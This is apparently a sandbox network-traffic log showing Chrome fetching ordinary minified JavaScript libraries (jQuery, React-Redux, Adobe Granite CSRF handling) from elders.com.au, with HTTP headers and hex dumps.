                                                                                                                                                                                                            last-modified: Thu, 29 Feb 2024 03:34:08 GMT
                                                                                                                                                                                                            etag: W/"e61-2386f26fb1bdc0-gzip"
                                                                                                                                                                                                            x-vhost: publish
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Age: 432349
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31557600
                                                                                                                                                                                                            X-Served-By: cache-dfw-kdfw8210114-DFW
                                                                                                                                                                                                            X-Cache: HIT
                                                                                                                                                                                                            X-Timer: S1709603799.636164,VS0,VS0,VE3
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b03b5da746d4-DFW
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC754INData Raw: 65 36 31 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 67 2c 65 29 7b 65 2e 47 72 61 6e 69 74 65 3d 65 2e 47 72 61 6e 69 74 65 7c 7c 7b 7d 3b 65 2e 47 72 61 6e 69 74 65 2e 24 3d 65 2e 47 72 61 6e 69 74 65 2e 24 7c 7c 67 3b 65 2e 5f 67 3d 65 2e 5f 67 7c 7c 7b 7d 3b 65 2e 5f 67 2e 24 3d 65 2e 5f 67 2e 24 7c 7c 67 3b 76 61 72 20 6b 3d 47 72 61 6e 69 74 65 2e 48 54 54 50 3b 67 2e 61 6a 61 78 53 65 74 75 70 28 7b 65 78 74 65 72 6e 61 6c 69 7a 65 3a 21 30 2c 65 6e 63 6f 64 65 50 61 74 68 3a 21 30 2c 68 6f 6f 6b 3a 21 30 2c 62 65 66 6f 72 65 53 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 63 29 7b 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 47 5f 49 53 5f 48 4f 4f 4b 45 44 26 26 47 5f 49 53 5f 48 4f 4f 4b 45 44 28 63 2e 75 72 6c 29 7c 7c 28 63 2e 65 78
                                                                                                                                                                                                            Data Ascii: e61(function(g,e){e.Granite=e.Granite||{};e.Granite.$=e.Granite.$||g;e._g=e._g||{};e._g.$=e._g.$||g;var k=Granite.HTTP;g.ajaxSetup({externalize:!0,encodePath:!0,hook:!0,beforeSend:function(h,c){"undefined"!==typeof G_IS_HOOKED&&G_IS_HOOKED(c.url)||(c.ex
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 7b 66 75 6e 63 74 69 6f 6e 20 65 28 29 7b 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 3d 5b 5d 7d 66 75 6e 63 74 69 6f 6e 20 6b 28 61 29 7b 76 61 72 20 62 3d 22 2f 2f 22 2b 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 2c 64 3d 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 62 3b 72 65 74 75 72 6e 20 61 3d 3d 3d 64 7c 7c 61 2e 73 6c 69 63 65 28 30 2c 64 2e 6c 65 6e 67 74 68 2b 31 29 3d 3d 3d 64 2b 22 2f 22 7c 7c 61 3d 3d 3d 62 7c 7c 61 2e 73 6c 69 63 65 28 30 2c 62 2e 6c 65 6e 67 74 68 2b 31 29 3d 3d 3d 62 2b 22 2f 22 7c 7c 21 2f 5e 28 5c 2f 5c 2f 7c 68 74 74 70 3a 7c 68 74 74 70 73 3a 29 2e 2a 2f 2e 74 65 73 74 28 61 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 61 29 7b 77 69 6e 64 6f 77 2e 63 6f 6e 73 6f 6c 65
                                                                                                                                                                                                            Data Ascii: {function e(){this._handler=[]}function k(a){var b="//"+document.location.host,d=document.location.protocol+b;return a===d||a.slice(0,d.length+1)===d+"/"||a===b||a.slice(0,b.length+1)===b+"/"||!/^(\/\/|http:|https:).*/.test(a)}function h(a){window.console
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 73 2e 5f 65 78 65 63 75 74 65 28 22 72 65 6a 65 63 74 22 2c 61 72 67 75 6d 65 6e 74 73 29 7d 2c 5f 65 78 65 63 75 74 65 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 6e 75 6c 6c 3d 3d 3d 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 50 72 6f 6d 69 73 65 20 61 6c 72 65 61 64 79 20 63 6f 6d 70 6c 65 74 65 64 2e 22 29 3b 0a 66 6f 72 28 76 61 72 20 64 3d 30 2c 74 3d 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 2e 6c 65 6e 67 74 68 3b 64 3c 74 3b 64 2b 2b 29 74 68 69 73 2e 5f 68 61 6e 64 6c 65 72 5b 64 5d 5b 61 5d 2e 61 70 70 6c 79 28 77 69 6e 64 6f 77 2c 62 29 3b 74 68 69 73 2e 74 68 65 6e 3d 66 75 6e 63 74 69 6f 6e 28 75 2c 76 29 7b 28 22 72 65 73 6f 6c 76 65 22 3d 3d 3d 61 3f 75 3a 76 29 2e 61 70 70 6c 79 28 77 69 6e 64
                                                                                                                                                                                                            Data Ascii: s._execute("reject",arguments)},_execute:function(a,b){if(null===this._handler)throw Error("Promise already completed.");for(var d=0,t=this._handler.length;d<t;d++)this._handler[d][a].apply(window,b);this.then=function(u,v){("resolve"===a?u:v).apply(wind
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC196INData Raw: 55 6e 61 62 6c 65 20 74 6f 20 61 74 74 61 63 68 20 43 53 52 46 20 74 6f 6b 65 6e 20 74 6f 20 61 6e 20 69 66 72 61 6d 65 20 65 6c 65 6d 65 6e 74 20 6f 6e 20 74 68 65 20 73 61 6d 65 20 6f 72 69 67 69 6e 22 29 7d 72 65 74 75 72 6e 20 61 7d 7d 63 28 29 3b 73 65 74 49 6e 74 65 72 76 61 6c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 28 29 7d 2c 33 45 35 29 3b 72 65 74 75 72 6e 7b 69 6e 69 74 69 61 6c 69 73 65 64 3a 21 31 2c 72 65 66 72 65 73 68 54 6f 6b 65 6e 3a 63 2c 5f 63 6c 65 61 72 54 6f 6b 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 66 3d 76 6f 69 64 20 30 3b 63 28 29 7d 7d 7d 29 3b 0d 0a
                                                                                                                                                                                                            Data Ascii: Unable to attach CSRF token to an iframe element on the same origin")}return a}}c();setInterval(function(){c()},3E5);return{initialised:!1,refreshToken:c,_clearToken:function(){f=void 0;c()}}});
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            127192.168.2.457805162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC600OUTGET /etc.clientlibs/foundation/clientlibs/jquery.lc-dd9b395c741ce2784096e26619e14910-lc.min.js HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC596INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:53 GMT
                                                                                                                                                                                                            Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                            Content-Length: 16
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            cache-control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Sat, 09 Mar 2024 18:21:32 GMT
                                                                                                                                                                                                            etag: W/"10-2386f26fb1bdc0"
                                                                                                                                                                                                            x-vhost: publish
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31557600
                                                                                                                                                                                                            X-Served-By: cache-sjc1000127-SJC
                                                                                                                                                                                                            X-Cache: HIT
                                                                                                                                                                                                            X-Timer: S1710183889.084560,VS0,VS0,VE1
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 1145978
                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b03d0835476f-DFW
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC16INData Raw: 77 69 6e 64 6f 77 2e 24 43 51 3d 5f 67 2e 24 3b
                                                                                                                                                                                                            Data Ascii: window.$CQ=_g.$;


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            128192.168.2.457807162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC601OUTGET /etc.clientlibs/el/clientlibs/clientlib-react.lc-2d7df618eb528a2ce626641aaccea776-lc.min.js HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC630INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 05:29:53 GMT
                                                                                                                                                                                                            Content-Type: application/javascript;charset=utf-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            x-frame-options: SAMEORIGIN
                                                                                                                                                                                                            Cache-Control: public, max-age=2592000, immutable
                                                                                                                                                                                                            last-modified: Thu, 17 Oct 2024 04:33:47 GMT
                                                                                                                                                                                                            etag: W/"284252-2386f26fb1bdc0-gzip"
                                                                                                                                                                                                            x-vhost: publish-elders
                                                                                                                                                                                                            x-content-type-options: nosniff
                                                                                                                                                                                                            strict-transport-security: max-age=31557600
                                                                                                                                                                                                            x-served-by: cache-pao-kpao1770058-PAO
                                                                                                                                                                                                            x-cache: MISS
                                                                                                                                                                                                            x-timer: S1729139627.757671,VS0,VS0,VE1123
                                                                                                                                                                                                            vary: Accept-Encoding
                                                                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                                                                            Age: 1145219
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8de2b03d6e8a2cbd-DFW
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC739INData Raw: 37 64 32 38 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 74 29 7b 66 6f 72 28 76 61 72 20 6e 2c 75 2c 69 3d 74 5b 30 5d 2c 63 3d 74 5b 31 5d 2c 61 3d 74 5b 32 5d 2c 70 3d 30 2c 73 3d 5b 5d 3b 70 3c 69 2e 6c 65 6e 67 74 68 3b 70 2b 2b 29 75 3d 69 5b 70 5d 2c 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 6f 2c 75 29 26 26 6f 5b 75 5d 26 26 73 2e 70 75 73 68 28 6f 5b 75 5d 5b 30 5d 29 2c 6f 5b 75 5d 3d 30 3b 66 6f 72 28 6e 20 69 6e 20 63 29 4f 62 6a 65 63 74 2e 70 72 6f 74 6f 74 79 70 65 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2e 63 61 6c 6c 28 63 2c 6e 29 26 26 28 65 5b 6e 5d 3d 63 5b 6e 5d 29 3b 66 6f 72 28 66 26 26 66 28 74 29 3b 73 2e 6c 65 6e 67 74 68
                                                                                                                                                                                                            Data Ascii: 7d28!function(e){function t(t){for(var n,u,i=t[0],c=t[1],a=t[2],p=0,s=[];p<i.length;p++)u=i[p],Object.prototype.hasOwnProperty.call(o,u)&&o[u]&&s.push(o[u][0]),o[u]=0;for(n in c)Object.prototype.hasOwnProperty.call(c,n)&&(e[n]=c[n]);for(f&&f(t);s.length
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 6f 66 20 53 79 6d 62 6f 6c 26 26 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 53 79 6d 62 6f 6c 2e 74 6f 53 74 72 69 6e 67 54 61 67 2c 7b 76 61 6c 75 65 3a 22 4d 6f 64 75 6c 65 22 7d 29 2c 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 7d 2c 75 2e 74 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 31 26 74 26 26 28 65 3d 75 28 65 29 29 2c 38 26 74 29 72 65 74 75 72 6e 20 65 3b 69 66 28 34 26 74 26 26 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 65 26 26 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 29 72 65 74 75 72 6e 20 65 3b 76 61 72 20 72 3d 4f 62 6a 65 63
                                                                                                                                                                                                            Data Ascii: of Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},u.t=function(e,t){if(1&t&&(e=u(e)),8&t)return e;if(4&t&&"object"===typeof e&&e&&e.__esModule)return e;var r=Objec
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 6e 20 78 7d 29 29 2c 6e 2e 64 28 74 2c 22 63 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 29 29 3b 76 61 72 20 72 3d 6e 28 31 36 39 29 2c 6f 3d 6e 28 32 34 35 29 2c 69 3d 6e 28 39 29 3b 6c 65 74 20 61 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 28 29 7d 3b 76 61 72 20 73 3d 6e 28 31 29 3b 63 6f 6e 73 74 20 75 3d 53 79 6d 62 6f 6c 2e 66 6f 72 28 22 72 65 61 63 74 2d 72 65 64 75 78 2d 63 6f 6e 74 65 78 74 22 29 2c 6c 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 65 3b 69 66 28 21 73 2e 63 72 65 61 74 65 43 6f 6e 74 65 78 74 29 72 65 74 75 72 6e 7b 7d 3b 63 6f 6e 73 74 20 74 3d 6e 75 6c 6c 21
                                                                                                                                                                                                            Data Ascii: n x})),n.d(t,"c",(function(){return y}));var r=n(169),o=n(245),i=n(9);let a=function(e){e()};var s=n(1);const u=Symbol.for("react-redux-context"),l="undefined"!==typeof globalThis?globalThis:{};function c(){var e;if(!s.createContext)return{};const t=null!
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 7b 63 61 6c 6c 62 61 63 6b 3a 65 2c 6e 65 78 74 3a 6e 75 6c 6c 2c 70 72 65 76 3a 6e 7d 3b 72 65 74 75 72 6e 20 6f 2e 70 72 65 76 3f 6f 2e 70 72 65 76 2e 6e 65 78 74 3d 6f 3a 74 3d 6f 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 72 26 26 6e 75 6c 6c 21 3d 3d 74 26 26 28 72 3d 21 31 2c 6f 2e 6e 65 78 74 3f 6f 2e 6e 65 78 74 2e 70 72 65 76 3d 6f 2e 70 72 65 76 3a 6e 3d 6f 2e 70 72 65 76 2c 6f 2e 70 72 65 76 3f 6f 2e 70 72 65 76 2e 6e 65 78 74 3d 6f 2e 6e 65 78 74 3a 74 3d 6f 2e 6e 65 78 74 29 7d 7d 7d 7d 63 6f 6e 73 74 20 77 3d 7b 6e 6f 74 69 66 79 28 29 7b 7d 2c 67 65 74 3a 28 29 3d 3e 5b 5d 7d 3b 66 75 6e 63 74 69 6f 6e 20 45 28 65 2c 74 29 7b 6c 65 74 20 6e 2c 72 3d 77 2c 6f 3d 30 2c 69 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 6c 2e 6f 6e 53 74 61 74 65
                                                                                                                                                                                                            Data Ascii: {callback:e,next:null,prev:n};return o.prev?o.prev.next=o:t=o,function(){r&&null!==t&&(r=!1,o.next?o.next.prev=o.prev:n=o.prev,o.prev?o.prev.next=o.next:t=o.next)}}}}const w={notify(){},get:()=>[]};function E(e,t){let n,r=w,o=0,i=!1;function a(){l.onState
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 63 2e 50 72 6f 76 69 64 65 72 2c 7b 76 61 6c 75 65 3a 75 7d 2c 72 29 7d 3b 66 75 6e 63 74 69 6f 6e 20 4f 28 29 7b 6c 65 74 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 66 3b 63 6f 6e 73 74 20 74 3d 65 3d 3d 3d 66 3f 64 3a 70 28 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 7b 73 74 6f 72 65 3a 65 7d 3d 74 28 29 3b 72 65 74 75 72 6e 20 65 7d 7d 63 6f 6e 73 74 20 6b 3d 4f 28 29 3b 66 75 6e 63 74 69 6f 6e 20 43 28 29 7b 6c 65 74 20 65 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 30 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b
                                                                                                                                                                                                            Data Ascii: s.createElement(c.Provider,{value:u},r)};function O(){let e=arguments.length>0&&void 0!==arguments[0]?arguments[0]:f;const t=e===f?d:p(e);return function(){const{store:e}=t();return e}}const k=O();function C(){let e=arguments.length>0&&void 0!==arguments[
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 65 6f 66 20 77 69 6e 64 6f 77 3f 77 69 6e 64 6f 77 3a 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 6f 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 69 3d 5b 5d 2c 61 3d 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 73 3d 69 2e 73 6c 69 63 65 2c 75 3d 69 2e 66 6c 61 74 3f 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 69 2e 66 6c 61 74 2e 63 61 6c 6c 28 65 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 69 2e 63 6f 6e 63 61 74 2e 61 70 70 6c 79 28 5b 5d 2c 65 29 7d 2c 6c 3d 69 2e 70 75 73 68 2c 63 3d 69 2e 69 6e 64 65 78 4f 66 2c 66 3d 7b 7d 2c 70 3d 66 2e 74 6f 53 74 72 69 6e 67 2c 64 3d 66 2e 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 68 3d 64 2e 74 6f 53 74 72 69 6e 67 2c 6d 3d 68 2e 63
                                                                                                                                                                                                            Data Ascii: eof window?window:this,(function(n,o){"use strict";var i=[],a=Object.getPrototypeOf,s=i.slice,u=i.flat?function(e){return i.flat.call(e)}:function(e){return i.concat.apply([],e)},l=i.push,c=i.indexOf,f={},p=f.toString,d=f.hasOwnProperty,h=d.toString,m=h.c
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 4f 2e 6d 61 70 28 74 68 69 73 2c 28 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 72 65 74 75 72 6e 20 65 2e 63 61 6c 6c 28 74 2c 6e 2c 74 29 7d 29 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 73 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 7d 2c 66 69 72 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 30 29 7d 2c 6c 61 73 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 71 28 2d 31 29 7d 2c 65 76 65 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 4f 2e 67 72 65 70 28 74 68 69
                                                                                                                                                                                                            Data Ascii: rn this.pushStack(O.map(this,(function(t,n){return e.call(t,n,t)})))},slice:function(){return this.pushStack(s.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(O.grep(thi
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 45 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f 6e 63 65 7d 2c 6e 29 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 30 3b 69 66 28 6b 28 65 29 29 66 6f 72 28 6e 3d 65 2e 6c 65 6e 67 74 68 3b 72 3c 6e 26 26 21 31 21 3d 3d 74 2e 63 61 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 3b 72 2b 2b 29 3b 65 6c 73 65 20 66 6f 72 28 72 20 69 6e 20 65 29 69 66 28 21 31 3d 3d 3d 74 2e 63 61 6c 6c 28 65 5b 72 5d 2c 72 2c 65 5b 72 5d 29 29 62 72 65 61 6b 3b 72 65 74 75 72 6e 20 65 7d 2c 74 65 78 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 22 22 2c 72 3d 30 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 21 6f 29
                                                                                                                                                                                                            Data Ascii: 0},globalEval:function(e,t,n){E(e,{nonce:t&&t.nonce},n)},each:function(e,t){var n,r=0;if(k(e))for(n=e.length;r<n&&!1!==t.call(e[r],r,e[r]);r++);else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},text:function(e){var t,n="",r=0,o=e.nodeType;if(!o)
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 5d 29 28 3f 3a 5c 5c 5c 5c 2e 29 2a 29 22 2b 41 2b 22 2b 24 22 2c 22 67 22 29 3b 4f 2e 63 6f 6e 74 61 69 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 65 3d 3d 3d 6e 7c 7c 21 28 21 6e 7c 7c 31 21 3d 3d 6e 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 28 65 2e 63 6f 6e 74 61 69 6e 73 3f 65 2e 63 6f 6e 74 61 69 6e 73 28 6e 29 3a 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 31 36 26 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 6e 29 29 29 7d 3b 76 61 72 20 4c 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 78 38 30 2d 5c 75 46 46 46 46 5c 77 2d 5d 2f 67 3b 66 75 6e
                                                                                                                                                                                                            Data Ascii: ])(?:\\\\.)*)"+A+"+$","g");O.contains=function(e,t){var n=t&&t.parentNode;return e===n||!(!n||1!==n.nodeType||!(e.contains?e.contains(n):e.compareDocumentPosition&&16&e.compareDocumentPosition(n)))};var L=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\x80-\uFFFF\w-]/g;fun
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC1369INData Raw: 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 41 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 41 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 41 2b 22 2a 5c 5c 29 7c 29 22 2c 22 69 22 29 2c 62 6f 6f 6c 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 3f 3a 22 2b 6b 2b 22 29 24 22 2c 22 69 22 29 2c 6e 65 65 64 73 43 6f 6e 74 65 78 74 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 41 2b 22 2a 5b 3e 2b 7e 5d 7c 3a 28 65 76 65 6e 7c 6f 64 64 7c 65 71 7c 67 74 7c 6c 74 7c 6e 74 68 7c 66 69 72 73 74 7c 6c 61 73 74 29 28 3f 3a 5c 5c 28 22 2b 41 2b 22 2a 28 28 3f 3a 2d 5c 5c 64 29 3f 5c 5c 64 2a 29 22 2b 41 2b 22 2a 5c 5c 29 7c 29 28 3f 3d 5b 5e 2d 5d 7c 24 29 22 2c 22 69 22 29 7d 2c 71 3d 2f 5e 28 3f 3a 69 6e 70 75 74 7c
                                                                                                                                                                                                            Data Ascii: "*(even|odd|(([+-]|)(\\d*)n|)"+A+"*(?:([+-]|)"+A+"*(\\d+)|))"+A+"*\\)|)","i"),bool:new RegExp("^(?:"+k+")$","i"),needsContext:new RegExp("^"+A+"*[>+~]|:(even|odd|eq|gt|lt|nth|first|last)(?:\\("+A+"*((?:-\\d)?\\d*)"+A+"*\\)|)(?=[^-]|$)","i")},q=/^(?:input|


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            129192.168.2.457809162.159.140.344432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-06 05:29:53 UTC968OUTGET /etc.clientlibs/core/wcm/components/commons/site/clientlibs/container.lc-0a6aff292f5cc42142779cde92054524-lc.min.js HTTP/1.1
                                                                                                                                                                                                            Host: elders.com.au
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: script
                                                                                                                                                                                                            Referer: https://elders.com.au/
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
